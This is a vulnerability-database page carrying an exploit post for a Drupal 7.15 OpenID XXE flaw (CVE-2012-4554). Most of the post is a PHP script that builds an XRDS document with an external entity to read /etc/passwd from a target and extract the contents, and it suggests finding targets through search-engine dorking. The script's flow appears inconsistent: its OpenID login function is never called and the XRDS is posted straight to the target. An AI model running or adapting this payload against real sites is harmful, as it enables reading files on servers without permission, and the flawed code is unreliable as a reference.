Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Drupal 7.15 XML Injection

🗓️ 13 Mar 2025 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 254 Views

Drupal 7.15 has an OpenID XXE vulnerability, allowing exploitation through specific code execution.

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2012-4554
29 May 201815:50
circl
Check Point Advisories		Dries Buytaert Drupal Core OpenID Module Information Disclosure (CVE-2012-4554)
3 Dec 201200:00
checkpoint_advisories
CVE		CVE-2012-4554
11 Nov 201211:00
cve
Cvelist		CVE-2012-4554
11 Nov 201211:00
cvelist
Debian CVE		CVE-2012-4554
11 Nov 201211:00
debiancve
Drupal		SA-CORE-2012-003 - Drupal core - Arbitrary PHP code execution and Information disclosure
17 Oct 201200:00
drupal
Tenable Nessus		Drupal 7.x < 7.16 Multiple Vulnerabilities
24 Oct 201200:00
nessus
Metasploit		Drupal OpenID External Entity Injection
24 Jan 201400:04
metasploit
NVD		CVE-2012-4554
11 Nov 201213:00
nvd
OpenVAS		FreeBSD Ports: drupal7
26 Nov 201200:00
openvas
Rows per page
=============================================================================================================================================
    | # Title     : Drupal 7.15 via OpenID XXE vulnerability                                                                                    |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://new.drupal.org/home                                                                                                 |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: XXE vulnerability in Drupal via OpenID
    
       (Related : https://packetstorm.news/files/id/180671/ Linked CVE numbers: CVE-2012-4554 ) .
    	
    [+] save code as poc.php.
    
    [+] Set target : line 66
    
    [+] PayLoad :
    
    <?php
    
    /**
     * استغلال ثغرة XXE في دروبال عبر OpenID
     */
    
    function send_openid_auth($target_uri, $identifier) {
        $url = rtrim($target_uri, '/') . "/?q=node&destination=node";
        
        $post_data = http_build_query([
            "openid_identifier" => $identifier,
            "name" => "",
            "pass" => "",
            "form_id" => "user_login_block",
            "op" => "Log in"
        ]);
        
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        
        $response = curl_exec($ch);
        curl_close($ch);
        
        return $response;
    }
    
    function generate_xrds($file_path) {
        // تصحيح المتغيرات بتحديد قيم صحيحة
        $xrds_ns = "xri://example.com/xrds";
        $xrd_ns = "xri://example.com/xrd";
        $v = "2.0";
    
        $xml = "<?xml version='1.0' encoding='UTF-8'?>";
        $xml .= "<!DOCTYPE foo [ <!ELEMENT URI ANY> <!ENTITY xxe SYSTEM 'file://$file_path'> ]>";
        $xml .= "<xrds:XRDS xmlns:xrds='$xrds_ns' xmlns='$xrd_ns*($v)' xmlns:openid='http://openid.net/xmlns/1.0'>";
        $xml .= "<XRD><Service><Type>http://specs.openid.net/auth/2.0/signon</Type>";
        $xml .= "<URI>&xxe;</URI></Service></XRD></xrds:XRDS>";
        
        return $xml;
    }
    
    function exploit_xxe($target_uri, $file_path) {
        $xrds_data = generate_xrds($file_path);
        $xrds_url = rtrim($target_uri, '/') . "/malicious.xrds";
        
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $xrds_url);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $xrds_data);
        curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/xrds+xml']);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        
        $response = curl_exec($ch);
        curl_close($ch);
        
        if (strpos($response, "<URI>") !== false) {
            preg_match('/<URI>(.*?)<\/URI>/', $response, $matches);
            return isset($matches[1]) ? $matches[1] : "File content not found.";
        }
        return "Exploit failed or file not readable.";
    }
    
    $target = "http://example.com/drupal";
    $file_to_read = "/etc/passwd";
    $result = exploit_xxe($target, $file_to_read);
    echo "Extracted File Content:\n" . $result;
    
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Mar 2025 00:00Current
7.2High risk
Vulners AI Score7.2
CVSS 25
EPSS0.55084
drupal vulnerability openid xxe exploitation code execution
254